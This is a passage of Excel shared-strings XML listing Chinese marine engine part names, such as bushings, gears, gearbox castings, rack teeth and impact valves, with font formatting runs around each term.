      <t>车钟规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车钟命令</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>车钟系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套（驱动端）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套（自由端）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套，夹具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套，排气阀杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套，液压管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套固定板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套温度测量</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>撑板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套燃油喷油泵接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套套筒扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套压力阀门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成套液压拉伸器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成型钢板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承接环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承磨材料</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承水板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>承压部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定距桨主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调桨主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>程序图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸草图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸简图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿链式法兰盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮安装测试表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮标志</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮测试</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单独的</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动装置注油器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>粗加工</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮和油套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮机构</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轮毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轮缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动公差</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动液压动力系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动液压动力系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮驱动液压动力系统及电磁阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮润滑油备用泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮润滑油泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮润滑油冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮上的传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮上的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮数据测试表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱安装生产建议</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱带轴承盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱盖铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱上部，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱上部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱上部总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱设计</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱使用</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱外钻孔</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱外钻孔总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱下部，焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱下部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱中部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱中部铸件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱装配</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮油规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮轴接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿式联轴节</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-PTO</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内齿</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外齿</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿条星</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击扳手，燃油凸轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击传感器附件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击阀拆卸工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
